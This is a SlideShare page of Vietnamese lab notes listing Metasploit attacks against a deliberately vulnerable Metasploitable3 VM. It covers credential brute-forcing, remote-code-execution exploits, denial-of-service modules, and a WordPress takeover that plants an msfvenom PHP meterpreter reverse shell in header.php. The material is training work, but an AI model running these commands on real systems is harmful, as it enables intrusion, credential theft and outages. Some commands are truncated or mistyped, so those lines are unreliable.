SlideShare a Scribd company logo
GlassFish
1. Port 4848
- msfconsole
- search glass
- use auxiliary/scanner/http/glassfish_login
- set user_file path__
- set pass_file path__
- set stop_on_success true
- set rhosts __
- set username ""
- run
Apache Struts - 8282
- use exploit/multi/http/struts_dmi_rest_exec
- set rhosts 192.168.228.132
- set rport 8282
- run
https://medium.com/@dt22/cve-2016-3087-apache-struts-rest-plugin-
with-dynamic-method-invocation-remote-code-execution-
197260439105
Tomcat - 8282
Apache Tomcat cung cấp phần mềm để chạy các ứng dụng Java trong
trình duyệt. Coyote là một máy chủ web độc lập cung cấp các servlet
cho các ứng dụng Tomcat. Nghĩa là, nó hoạt động giống như máy chủ
web Apache, nhưng dành cho Trang máy chủ Java (JSP). Tất cả điều
này có nghĩa là các trang web được truy cập qua cổng 8282 sẽ được tập
hợp bởi một ứng dụng web Java.
Có nhiều mô-đun Metasploit có sẵn cho Tomcat vì vậy bạn nên tập trung
vào mục tiêu của mình:
Khảo sát trang web
Khai thác các trang dễ bị tổn thương
Lấy thông tin xác thực
Triển khai tải trọng
1. Tomcat_enum – Username của tomcat
- use auxiliary/scanner/http/tomcat_enum
- set rhosts 192.168.228.132
- set rport 8282
- set targeturi /manager
- run
2. Tomcat_login
- use auxiliary/scanner/http/tomcat_mgr_login
- set userpass_file ""
- set rhosts 192.168.228.132
- set rport 8282
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- run
3. Tomcat upload
- use exploit/multi/http/tomcat_mgr_upload
- set rhosts 192.168.228.132
- set rport 8282
- set httppassword sploit
- set httpusername sploit
- set target 1
- set payload payload/windows/meterpreter/reverse_tcp
- run
Kết quả:
Jenkins - 8484
Jenkins là một máy chủ tự động hóa mã nguồn mở được viết bằng Java.
Jenkins giúp tự động hóa phần không liên quan đến con người trong quá
trình phát triển phần mềm, với sự tích hợp liên tục và tạo điều kiện thuận
lợi cho các khía cạnh kỹ thuật của quá trình phân phối liên tục.
1. jenkins_script_console
- use expl
- set rport 8484
- set targeturi /
- run
Sau khi vào được shell có thể thao tác như tìm thông tin, hay thêm tài
khoản,,....
metasploitable example attacks list.docx
IIS - FTP - 21
Vai trò Máy chủ Web (IIS) trong Windows Server cung cấp nền tảng an
toàn, dễ quản lý, mô-đun và có thể mở rộng để lưu trữ các trang web,
dịch vụ và ứng dụng một cách đáng tin cậy.
Trong Windows Server 2008, Internet Information Services (IIS) có giao
diện quản trị và kho cấu hình mới, đồng thời dịch vụ FTP mới được tích
hợp chặt chẽ với thiết kế này. Microsoft đã viết lại dịch vụ FTP và dịch
vụ phiên bản cập nhật này kết hợp nhiều tính năng mới cho phép tác giả
web xuất bản nội dung tốt hơn trước và cung cấp cho quản trị viên web
nhiều tùy chọn triển khai và bảo mật hơn.
Nhưng mặc dù được tích hợp trong Máy chủ Web, dịch vụ IIS FTP hoạt
động khá giống với bất kỳ máy chủ FTP nào khác,
1. IIS-FTP - 21
- use auxiliary/scanner/ftp/ftp_login
- set rhosts 192.168.228.132
- set rport 21
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHshDH/metasploitable3/pass
- run
Sau khi biết được tài khoản, mật khẩu có thể tiến hành tấn công:
- dotdotpwn -m ftp -o windows -U Administrator -P vagrant -h
192.168.228.132
2. IIS - HTTP
Lỗ hổng thực thi mã từ xa tồn tại trong ngăn xếp giao thức HTTP
(HTTP.sys) xảy ra khi HTTP.sys phân tích cú pháp các yêu cầu HTTP
được tạo đặc biệt không đúng cách. Kẻ tấn công khai thác thành công lỗ
hổng này có thể thực thi mã tùy ý trong tài khoản Hệ thống.
Từ chối dịch vụ IIS
Lỗ hổng này được OpenVAS báo cáo là cực kỳ nghiêm trọng. Nó được
xác định bằng số Bản tin bảo mật của Microsoft giải thích nó (MS15-
034 ) và bằng CVE của nó ( 2015-1635 ).
Tạo tấn công DoS:
- use auxiliary/dos/http/ms15_034_ulonglongadd
- set rhosts 192.168.228.132
- run
Kết quả máy mục tiêu bị sập:
psexec
PsExec là một trong những cách khai thác phổ biến nhất chống lại
Microsoft Windows. Đó là một cách tuyệt vời để kiểm tra độ bảo mật
của mật khẩu và chứng minh mật khẩu bị đánh cắp có thể dẫn đến sự
xâm phạm hoàn toàn toàn bộ mạng công ty như thế nào.
Để có thể sử dụng exploit/windows/smb/psexec:
Tên người dùng và mật khẩu hợp lệ phải được đặt.
Tường lửa phải cho phép lưu lượng SMB.
Chính sách bảo mật mạng của máy Windows từ xa phải cho phép điều
đó. Xem phần "Vô hiệu hóa UAC từ xa" bên dưới.
1. Login
- use auxiliary/scanner/smb/smb_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- run
2. Psexec
- use exploits/windows/smb/psexec
- set rhosts 192.168.228.132
- set smbuser vagrant
- set smbpass vagrant
- run
https://github.com/rapid7/metasploit-framework/blob/master/
documentation/modules/exploit/windows/smb/psexec.md
SSH -22
Metasploit có một mô-đun phụ trợ sẽ kiểm tra thông tin xác thực SSH
trên nhiều loại máy và báo cáo các lần đăng nhập thành công. Nếu bạn
đã kết nối với cơ sở dữ liệu, mô-đun này sẽ ghi lại thông tin đăng nhập
và máy chủ thành công để bạn có thể theo dõi quyền truy cập của mình.
Ngoài ra, mỗi lần đăng nhập thành công sẽ mở ngay một phiên trên máy
từ xa. Sau đó, phiên này có thể được nâng cấp lên phiên Meterpreter
- use auxiliary/scanner/ssh/ssh_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set verbose true
-run
WinRM - 5985
WinRM là dịch vụ quản lý từ xa dành cho Windows được cài đặt nhưng
không được bật theo mặc định trong Windows XP và các phiên bản cao
hơn, nhưng bạn cũng có thể cài đặt nó trên các hệ điều hành cũ hơn.
Dịch vụ chị em của WinRM có tên là Windows Remote Shell (WinRS).
Cả hai dịch vụ được xác thực này đều được liên kết với trình nghe
SOAP HTTP hoặc HTTPS và hỗ trợ xác thực Kerberos và NTLM theo
mặc định. Tôi bắt đầu xem xét xác thực NTLM vì nó đã được hỗ trợ
trong Metasploit.
Nếu bạn đang thiết lập WinRM, xin lưu ý rằng thiết lập quickconfig mặc
định sẽ khiến dịch vụ ở trạng thái khó xử, không hoạt động. Nó sẽ đặt
AllowUnencrypted thành false , nghĩa là nó sẽ từ chối thiết lập bất kỳ
phiên nào qua HTTP mà không có SSL. Thật không may, thiết lập
quickconfig sẽ không định cấu hình trình nghe HTTPS. Giờ đây, người
dùng có thể đặt AllowUnecrypted thành true hoặc định cấu hình trình
nghe HTTPS.
Điều đầu tiên cần xây dựng là một mô-đun khám phá cơ bản xác định
xem dịch vụ WinRM có đang lắng nghe trên một cổng HTTP(S) nhất
định hay không. Nếu có, nó cũng liệt kê các phương thức xác thực được
hỗ trợ. Ảnh chụp màn hình cho thấy cách mô-đun khám phá tạo mục
nhập dịch vụ cho WinRM với các loại xác thực có trong thông tin.
1. Quét cổng có WinRM
- use auxiliary/scanner/winrm/winrm_auth_methods
- set rhosts 192.168.228.132
- run
2. Tấn công đăng nhập:
- use auxiliary/scanner/winrm/winrm_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set password pass
- run
3. Truy vấn WQL
Khi đã tìm thấy thông tin xác thực hợp lệ cho dịch vụ WinRM, chúng tôi
có thể lạm dụng chức năng WMI để thực thi các truy vấn WQL tùy ý đối
với mục tiêu. Mô-đun này cũng sẽ lưu kết quả truy vấn dưới dạng loot.
Trong ví dụ bên dưới, chúng tôi chạy truy vấn WQL để lấy kiến trúc của
hệ thống từ xa (32 hoặc 64 bit).
- use auxiliary/scanner/winrm/winrm_wql
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
4. Truy vấn với winrs cmd
Người chị song sinh dính liền của WinRM, WinRS, cho phép người
dùng khởi tạo một shell trên hộp điều khiển từ xa, gửi lệnh và nhận các
luồng đầu ra. Metasploit có thể gửi bất kỳ lệnh Windows tùy ý nào và
nhận cả STDOUT và STDERR, về cơ bản cung cấp một lớp vỏ không
trạng thái qua HTTP/SOAP.
Điều quan trọng cần lưu ý là hệ vỏ WinRS có thời gian tồn tại tối đa
trước khi dịch vụ đóng chúng. Dịch vụ này cũng có giới hạn lệnh đồng
thời có thể định cấu hình, nhưng những điều này không quan trọng trong
trường hợp này vì chúng tôi chỉ thực thi một lệnh duy nhất và dọn dẹp
shell. Ở đây, chúng tôi thực hiện một lệnh ipconfig đơn giản làm ví dụ.
- use auxiliary/scanner/winrm/winrm_cmd
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
Bây giờ chúng ta đang ở vị trí thuận lợi để có được đạn pháo. Trong
nhiều năm, mô-đun PSExec là cách chính để sử dụng thông tin xác thực
hệ thống để lấy shell. Điều này ngày càng trở nên kém tin cậy hơn vì
nhiều tải trọng của Metasploit Framework bị các giải pháp chống vi-rút
phát hiện. Người dùng Metasploit Pro có tùy chọn tạo động các tải trọng
EXE, nhưng điều này không dễ thực hiện được.
5. Thực hiện script exploit
Ưu điểm của mô-đun khai thác WinRM Script Exec là có thể lấy shell
mà không cần kích hoạt giải pháp chống vi-rút trong một số trường hợp
nhất định. Mô-đun này có hai phương thức phân phối tải trọng khác
nhau. Phương thức phân phối chính của nó là thông qua việc sử dụng
PowerShell 2.0. Mô-đun này kiểm tra xem PowerShell 2.0 có sẵn trên hệ
thống hay không. Sau đó, nó sẽ cố gắng kích hoạt thực thi tập lệnh
không hạn chế, một bước quan trọng vì PowerShell không thực thi các
tệp tập lệnh không dấu theo mặc định. Nếu một trong hai lần kiểm tra
này không thành công, nó sẽ mặc định sử dụng phương thức tải trọng
VBS CmdStager, nếu không nó sẽ sử dụng phương thức Powershell 2.0
của chúng tôi.
- use exploits/windows/winrm/winrm_script_exec
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
Chinese caidao - 80
- use auxiliary/scanner/http/caidao_bruteforce_login
- set rhosts 192.168.228.
- run
ManageEngine - 8020
Desktop Central là phần mềm quản lý thiết bị di động và máy tính để
bàn tích hợp giúp quản lý máy chủ, máy tính xách tay, máy tính để bàn,
điện thoại thông minh và máy tính bảng từ một vị trí trung tâm. Nó được
sử dụng để tự động hóa các quy trình quản lý máy tính để bàn thông
thường của bạn như cài đặt bản vá, phân phối phần mềm, quản lý Tài
sản CNTT, quản lý giấy phép phần mềm, giám sát số liệu thống kê sử
dụng phần mềm, quản lý việc sử dụng thiết bị USB, kiểm soát máy tính
để bàn từ xa, v.v. Nó hỗ trợ quản lý cả hệ điều hành Windows, Mac và
Linux.
- use exploit/windows/http/manageengine_connectionid_write
- set rhosts 192.168.228.132
- run
ElasticSearch -9200
Mô-đun này khai thác lỗ hổng thực thi lệnh từ xa (RCE) trong
ElasticSearch, có thể khai thác theo mặc định trên ElasticSearch trước
phiên bản 1.2.0. Lỗi được tìm thấy trong API REST, không yêu cầu xác
thực, trong đó chức năng tìm kiếm cho phép thực thi tập lệnh động. Nó
có thể được sử dụng để kẻ tấn công từ xa thực thi mã Java tùy ý. Mô-đun
này đã được thử nghiệm thành công trên ElasticSearch 1.1.1 trên Ubuntu
Server 12.04 và Windows XP SP3.
- use exploit/multi/elasticsearch/script_mvel_rce
- set rhosts 192.168.228.132
- run
Apache Axis2
1. Apache axis2 exploit
Ứng dụng Web Apache Axis2 có ba phần chính: 'Dịch vụ' liệt kê tất cả
các dịch vụ có sẵn được triển khai trong máy chủ này, 'Xác thực' kiểm
tra hệ thống để xem liệu tất cả các thư viện cần thiết có sẵn sàng hay
không và xem thông tin hệ thống, và 'Quản trị' là mô-đun Quản trị Web
Axis2 là bảng điều khiển để quản lý cài đặt Apache Axis2. Mô-đun
Quản trị Web Axis2 cung cấp cách cấu hình Axis2 một cách linh hoạt.
- use exploit/multi/http/axis2_deployer
- set rhosts 192.168.228.132
- set rport 8282
- run
2. Apache axis2 login
- msfconsole
- use auxiliary/scanner/http/axis_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- set rhosts 192.168.228.132
- set rport 8282
- run
WebDAV - 8585
Mô-đun này có thể lạm dụng các máy chủ web bị định cấu hình sai để
tải lên và xóa nội dung web thông qua các yêu cầu HTTP PUT và
DELETE.
- use auxiliary/scanner/http/http_put
- set rhosts 192.168.228.132
- set rport 8585
- set filename meterpreter.php
- set path /uploads
- run
https://github.com/rapid7/metasploit-framework/blob/master/
documentation/modules/exploit/multi/http/axis2_deployer.md
SNMP - 161
Giao thức quản lý mạng đơn giản là giao thức Internet tiêu chuẩn để thu
thập và tổ chức thông tin về các thiết bị được quản lý trên mạng IP và để
sửa đổi thông tin đó nhằm thay đổi hành vi của thiết bị.
- use auxiliary/scanner/snmp/snmp_enum
- set rhosts 192.168.228.132
- run
MySQL
Tấn công mật khẩu
- use auxiliary/scanner/mysql/mysql_login
- set RHOSTS 192.168.157.132
- set userpass_file /home/kali/Documents/user_pass
- set verbose yes
- run
Liệt kê tất cả các tài khoản MySQL trên hệ thống và các đặc quyền khác
nhau của chúng.
- use auxiliary/admin/mysql/mysql_enum
- set RHOSTS 192.168.157.132
- set username root
- set password ‘’
- run
Truy xuất toàn bộ nội dung của cơ sở dữ liệu:
- auxiliary/scanner/mysql/mysql_schemadump
- set RHOSTS 192.168.157.132
- set username root
- set password ‘’
- run
JMX-1617
Mô-đun này tận dụng cấu hình không an toàn của giao diện Java JMX,
cho phép tải các lớp từ bất kỳ URL (HTTP) từ xa nào. Các giao diện
JMX bị vô hiệu hóa xác thực
(com.sun.management.jmxremote.authenticate=false) sẽ dễ bị tấn công,
trong khi các giao diện được bật xác thực sẽ chỉ dễ bị tấn công nếu cấu
hình yếu được triển khai (cho phép sử dụng
javax.management.loading.MLet, có trình quản lý bảo mật cho phép tải
ClassLoader MBean, v.v.)
- use multi/misc/java_jmx_server
- set rhosts 192.168.228.132
- set rport 1617
- run
Wordpress - 8585
Khai thác tài khoản mật khẩu trong trong login wordpress.
- use auxiliary/scanner/http/wordpress_xmlrpc_login
- set RHOSTS 192.168.157.132
- set RPORT 8585
- set targeturi /wordpress
- set userpass_file /home/kali/Documents/user_pass
- set blank_passwords true
- set verbose false
- run
Liệt kê những người dùng hiện có và sau đó nó sẽ kiểm tra thông tin xác
thực hợp lệ:
- use auxiliary/scanner/http/wordpress_login_enum
- set RHOSTS 192.168.157.132
- set RPORT 8585
- set userpass_file /home/kali/Documents/user_pass
- set targeturi /wordpress
- run
Exploit chiếm quyền điều khiển:
-B1: Dùng user, pass đã lấy được để đăng nhập vào wordpress và vào
Appearance > Editor chọn header.php
-B2: dùng lệnh sau để tạo phần code thêm cho header.php trong đó gán
lhost và lport là ip máy tấn công và port tấn công
- msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.157.132
lport=5555 -f raw > meterp.php
-B3: copy nội dung file đã tạo paste vào header.php rồi ấn upload
-B4: Setup tool để truy cập shell
- use exploit/multi/handler
- set LHOST 192.168.157.128
- set LPORT 5555
- set payload php/meterpreter/reverse_tcp
- run
-B5: vào lại :8585/wordpress để tool có thể gửi ngược để truy cập shell
Tấn công upload form:
- use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- set rhosts 192.168.228.132
- set rport 8585
- set targeturi /wordpress/
- set form_path /index.php/king-of-hearts/
- run
metasploitable example attacks list.docx
Remote Desktop
Remote bằng shell:
Dùng DoS đánh sập cổng remote desktop:
- use auxiliary/scanner/rdp/ms12_020_check
- set RHOSTS 192.168.157.132
- run
Dịch vụ này cũng dễ bị tấn công Bluekeep và bạn có thể sử dụng mô-
đun Metasploit thích hợp để kiểm tra sự tồn tại của lỗ hổng này trong
máy mục tiêu.
- use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- set RHOSTS 192.168.157.132
- set target 2
- run
PHPMyAdmin
Ruby on Rails
Không vào đc port 3000

More Related Content

DOCX
cài đặt metasploit
DOCX
Bai bao cao 3
DOCX
DOCX
Báo cáo tuần 4
PDF
INT1484-Bai-thuc-hanh-01.pdf
PPTX
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
PPTX
Báo cáo system hacking
cài đặt metasploit
Bai bao cao 3
Báo cáo tuần 4
INT1484-Bai-thuc-hanh-01.pdf
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
Báo cáo system hacking

Similar to metasploitable example attacks list.docx (20)

PPTX
Slide báo cáo: System Hacking
PDF
1.3 - cac cong cu.pdf
DOCX
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
PDF
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
DOCX
Athena tuần 4
PPT
Lohong Buoi34
PPT
Lohong Buoi34
PPT
Lohong Buoi34
DOCX
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
PDF
Slide metaploit
DOCX
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
DOCX
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
PPTX
Metasploit
PPSX
Linux web hosting (Thuyet trinh)
PPSX
Linux web hosting (Thuyet trinh)
PDF
Ceh lab book_tieng_viet_phan3
DOCX
Tạo mã độc trên vps
PDF
Lab security+ Bài 8: Netcat
PDF
Lab security+baiso8 netcat
Slide báo cáo: System Hacking
1.3 - cac cong cu.pdf
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Athena tuần 4
Lohong Buoi34
Lohong Buoi34
Lohong Buoi34
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
Slide metaploit
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
Metasploit
Linux web hosting (Thuyet trinh)
Linux web hosting (Thuyet trinh)
Ceh lab book_tieng_viet_phan3
Tạo mã độc trên vps
Lab security+ Bài 8: Netcat
Lab security+baiso8 netcat
Ad

metasploitable example attacks list.docx

  • 1. GlassFish 1. Port 4848 - msfconsole - search glass - use auxiliary/scanner/http/glassfish_login - set user_file path__ - set pass_file path__ - set stop_on_success true - set rhosts __ - set username "" - run
  • 2. Apache Struts - 8282 - use exploit/multi/http/struts_dmi_rest_exec - set rhosts 192.168.228.132 - set rport 8282 - run https://medium.com/@dt22/cve-2016-3087-apache-struts-rest-plugin- with-dynamic-method-invocation-remote-code-execution- 197260439105
  • 3. Tomcat - 8282 Apache Tomcat cung cấp phần mềm để chạy các ứng dụng Java trong trình duyệt. Coyote là một máy chủ web độc lập cung cấp các servlet cho các ứng dụng Tomcat. Nghĩa là, nó hoạt động giống như máy chủ web Apache, nhưng dành cho Trang máy chủ Java (JSP). Tất cả điều này có nghĩa là các trang web được truy cập qua cổng 8282 sẽ được tập hợp bởi một ứng dụng web Java. Có nhiều mô-đun Metasploit có sẵn cho Tomcat vì vậy bạn nên tập trung vào mục tiêu của mình: Khảo sát trang web Khai thác các trang dễ bị tổn thương Lấy thông tin xác thực Triển khai tải trọng 1. Tomcat_enum – Username của tomcat - use auxiliary/scanner/http/tomcat_enum - set rhosts 192.168.228.132 - set rport 8282 - set targeturi /manager - run
  • 4. 2. Tomcat_login - use auxiliary/scanner/http/tomcat_mgr_login - set userpass_file "" - set rhosts 192.168.228.132 - set rport 8282 - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHDH/metasploitable3/pass - set stop_on_success true - run 3. Tomcat upload
  • 5. - use exploit/multi/http/tomcat_mgr_upload - set rhosts 192.168.228.132 - set rport 8282 - set httppassword sploit - set httpusername sploit - set target 1 - set payload payload/windows/meterpreter/reverse_tcp - run Kết quả:
  • 6. Jenkins - 8484 Jenkins là một máy chủ tự động hóa mã nguồn mở được viết bằng Java. Jenkins giúp tự động hóa phần không liên quan đến con người trong quá trình phát triển phần mềm, với sự tích hợp liên tục và tạo điều kiện thuận lợi cho các khía cạnh kỹ thuật của quá trình phân phối liên tục. 1. jenkins_script_console - use expl - set rport 8484 - set targeturi / - run Sau khi vào được shell có thể thao tác như tìm thông tin, hay thêm tài khoản,,....
  • 8. IIS - FTP - 21 Vai trò Máy chủ Web (IIS) trong Windows Server cung cấp nền tảng an toàn, dễ quản lý, mô-đun và có thể mở rộng để lưu trữ các trang web, dịch vụ và ứng dụng một cách đáng tin cậy. Trong Windows Server 2008, Internet Information Services (IIS) có giao diện quản trị và kho cấu hình mới, đồng thời dịch vụ FTP mới được tích hợp chặt chẽ với thiết kế này. Microsoft đã viết lại dịch vụ FTP và dịch vụ phiên bản cập nhật này kết hợp nhiều tính năng mới cho phép tác giả web xuất bản nội dung tốt hơn trước và cung cấp cho quản trị viên web nhiều tùy chọn triển khai và bảo mật hơn. Nhưng mặc dù được tích hợp trong Máy chủ Web, dịch vụ IIS FTP hoạt động khá giống với bất kỳ máy chủ FTP nào khác, 1. IIS-FTP - 21 - use auxiliary/scanner/ftp/ftp_login - set rhosts 192.168.228.132 - set rport 21 - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHshDH/metasploitable3/pass - run
  • 9. Sau khi biết được tài khoản, mật khẩu có thể tiến hành tấn công: - dotdotpwn -m ftp -o windows -U Administrator -P vagrant -h 192.168.228.132
  • 10. 2. IIS - HTTP Lỗ hổng thực thi mã từ xa tồn tại trong ngăn xếp giao thức HTTP (HTTP.sys) xảy ra khi HTTP.sys phân tích cú pháp các yêu cầu HTTP được tạo đặc biệt không đúng cách. Kẻ tấn công khai thác thành công lỗ hổng này có thể thực thi mã tùy ý trong tài khoản Hệ thống. Từ chối dịch vụ IIS Lỗ hổng này được OpenVAS báo cáo là cực kỳ nghiêm trọng. Nó được xác định bằng số Bản tin bảo mật của Microsoft giải thích nó (MS15- 034 ) và bằng CVE của nó ( 2015-1635 ). Tạo tấn công DoS:
  • 11. - use auxiliary/dos/http/ms15_034_ulonglongadd - set rhosts 192.168.228.132 - run Kết quả máy mục tiêu bị sập:
  • 12. psexec PsExec là một trong những cách khai thác phổ biến nhất chống lại Microsoft Windows. Đó là một cách tuyệt vời để kiểm tra độ bảo mật của mật khẩu và chứng minh mật khẩu bị đánh cắp có thể dẫn đến sự xâm phạm hoàn toàn toàn bộ mạng công ty như thế nào. Để có thể sử dụng exploit/windows/smb/psexec: Tên người dùng và mật khẩu hợp lệ phải được đặt. Tường lửa phải cho phép lưu lượng SMB. Chính sách bảo mật mạng của máy Windows từ xa phải cho phép điều đó. Xem phần "Vô hiệu hóa UAC từ xa" bên dưới. 1. Login - use auxiliary/scanner/smb/smb_login - set rhosts 192.168.228.132 - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHDH/metasploitable3/pass - run 2. Psexec - use exploits/windows/smb/psexec
  • 13. - set rhosts 192.168.228.132 - set smbuser vagrant - set smbpass vagrant - run https://github.com/rapid7/metasploit-framework/blob/master/ documentation/modules/exploit/windows/smb/psexec.md
  • 14. SSH -22 Metasploit có một mô-đun phụ trợ sẽ kiểm tra thông tin xác thực SSH trên nhiều loại máy và báo cáo các lần đăng nhập thành công. Nếu bạn đã kết nối với cơ sở dữ liệu, mô-đun này sẽ ghi lại thông tin đăng nhập và máy chủ thành công để bạn có thể theo dõi quyền truy cập của mình. Ngoài ra, mỗi lần đăng nhập thành công sẽ mở ngay một phiên trên máy từ xa. Sau đó, phiên này có thể được nâng cấp lên phiên Meterpreter - use auxiliary/scanner/ssh/ssh_login - set rhosts 192.168.228.132 - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHDH/metasploitable3/pass - set verbose true -run
  • 15. WinRM - 5985 WinRM là dịch vụ quản lý từ xa dành cho Windows được cài đặt nhưng không được bật theo mặc định trong Windows XP và các phiên bản cao hơn, nhưng bạn cũng có thể cài đặt nó trên các hệ điều hành cũ hơn. Dịch vụ chị em của WinRM có tên là Windows Remote Shell (WinRS). Cả hai dịch vụ được xác thực này đều được liên kết với trình nghe SOAP HTTP hoặc HTTPS và hỗ trợ xác thực Kerberos và NTLM theo mặc định. Tôi bắt đầu xem xét xác thực NTLM vì nó đã được hỗ trợ trong Metasploit. Nếu bạn đang thiết lập WinRM, xin lưu ý rằng thiết lập quickconfig mặc định sẽ khiến dịch vụ ở trạng thái khó xử, không hoạt động. Nó sẽ đặt AllowUnencrypted thành false , nghĩa là nó sẽ từ chối thiết lập bất kỳ phiên nào qua HTTP mà không có SSL. Thật không may, thiết lập quickconfig sẽ không định cấu hình trình nghe HTTPS. Giờ đây, người dùng có thể đặt AllowUnecrypted thành true hoặc định cấu hình trình nghe HTTPS. Điều đầu tiên cần xây dựng là một mô-đun khám phá cơ bản xác định xem dịch vụ WinRM có đang lắng nghe trên một cổng HTTP(S) nhất định hay không. Nếu có, nó cũng liệt kê các phương thức xác thực được hỗ trợ. Ảnh chụp màn hình cho thấy cách mô-đun khám phá tạo mục nhập dịch vụ cho WinRM với các loại xác thực có trong thông tin. 1. Quét cổng có WinRM - use auxiliary/scanner/winrm/winrm_auth_methods - set rhosts 192.168.228.132 - run
  • 16. 2. Tấn công đăng nhập: - use auxiliary/scanner/winrm/winrm_login - set rhosts 192.168.228.132 - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHDH/metasploitable3/pass - set password pass - run 3. Truy vấn WQL Khi đã tìm thấy thông tin xác thực hợp lệ cho dịch vụ WinRM, chúng tôi có thể lạm dụng chức năng WMI để thực thi các truy vấn WQL tùy ý đối với mục tiêu. Mô-đun này cũng sẽ lưu kết quả truy vấn dưới dạng loot.
  • 17. Trong ví dụ bên dưới, chúng tôi chạy truy vấn WQL để lấy kiến trúc của hệ thống từ xa (32 hoặc 64 bit). - use auxiliary/scanner/winrm/winrm_wql - set rhosts 192.168.228.132 - set username vagrant - set password vagrant - run 4. Truy vấn với winrs cmd Người chị song sinh dính liền của WinRM, WinRS, cho phép người dùng khởi tạo một shell trên hộp điều khiển từ xa, gửi lệnh và nhận các luồng đầu ra. Metasploit có thể gửi bất kỳ lệnh Windows tùy ý nào và nhận cả STDOUT và STDERR, về cơ bản cung cấp một lớp vỏ không trạng thái qua HTTP/SOAP. Điều quan trọng cần lưu ý là hệ vỏ WinRS có thời gian tồn tại tối đa trước khi dịch vụ đóng chúng. Dịch vụ này cũng có giới hạn lệnh đồng thời có thể định cấu hình, nhưng những điều này không quan trọng trong trường hợp này vì chúng tôi chỉ thực thi một lệnh duy nhất và dọn dẹp shell. Ở đây, chúng tôi thực hiện một lệnh ipconfig đơn giản làm ví dụ. - use auxiliary/scanner/winrm/winrm_cmd - set rhosts 192.168.228.132 - set username vagrant
  • 18. - set password vagrant - run Bây giờ chúng ta đang ở vị trí thuận lợi để có được đạn pháo. Trong nhiều năm, mô-đun PSExec là cách chính để sử dụng thông tin xác thực hệ thống để lấy shell. Điều này ngày càng trở nên kém tin cậy hơn vì nhiều tải trọng của Metasploit Framework bị các giải pháp chống vi-rút phát hiện. Người dùng Metasploit Pro có tùy chọn tạo động các tải trọng EXE, nhưng điều này không dễ thực hiện được. 5. Thực hiện script exploit Ưu điểm của mô-đun khai thác WinRM Script Exec là có thể lấy shell mà không cần kích hoạt giải pháp chống vi-rút trong một số trường hợp
  • 19. nhất định. Mô-đun này có hai phương thức phân phối tải trọng khác nhau. Phương thức phân phối chính của nó là thông qua việc sử dụng PowerShell 2.0. Mô-đun này kiểm tra xem PowerShell 2.0 có sẵn trên hệ thống hay không. Sau đó, nó sẽ cố gắng kích hoạt thực thi tập lệnh không hạn chế, một bước quan trọng vì PowerShell không thực thi các tệp tập lệnh không dấu theo mặc định. Nếu một trong hai lần kiểm tra này không thành công, nó sẽ mặc định sử dụng phương thức tải trọng VBS CmdStager, nếu không nó sẽ sử dụng phương thức Powershell 2.0 của chúng tôi. - use exploits/windows/winrm/winrm_script_exec - set rhosts 192.168.228.132 - set username vagrant - set password vagrant - run
  • 20. Chinese caidao - 80 - use auxiliary/scanner/http/caidao_bruteforce_login - set rhosts 192.168.228. - run
  • 21. ManageEngine - 8020 Desktop Central là phần mềm quản lý thiết bị di động và máy tính để bàn tích hợp giúp quản lý máy chủ, máy tính xách tay, máy tính để bàn, điện thoại thông minh và máy tính bảng từ một vị trí trung tâm. Nó được sử dụng để tự động hóa các quy trình quản lý máy tính để bàn thông thường của bạn như cài đặt bản vá, phân phối phần mềm, quản lý Tài sản CNTT, quản lý giấy phép phần mềm, giám sát số liệu thống kê sử dụng phần mềm, quản lý việc sử dụng thiết bị USB, kiểm soát máy tính để bàn từ xa, v.v. Nó hỗ trợ quản lý cả hệ điều hành Windows, Mac và Linux. - use exploit/windows/http/manageengine_connectionid_write - set rhosts 192.168.228.132 - run
  • 22. ElasticSearch -9200 Mô-đun này khai thác lỗ hổng thực thi lệnh từ xa (RCE) trong ElasticSearch, có thể khai thác theo mặc định trên ElasticSearch trước phiên bản 1.2.0. Lỗi được tìm thấy trong API REST, không yêu cầu xác thực, trong đó chức năng tìm kiếm cho phép thực thi tập lệnh động. Nó có thể được sử dụng để kẻ tấn công từ xa thực thi mã Java tùy ý. Mô-đun này đã được thử nghiệm thành công trên ElasticSearch 1.1.1 trên Ubuntu Server 12.04 và Windows XP SP3. - use exploit/multi/elasticsearch/script_mvel_rce - set rhosts 192.168.228.132 - run
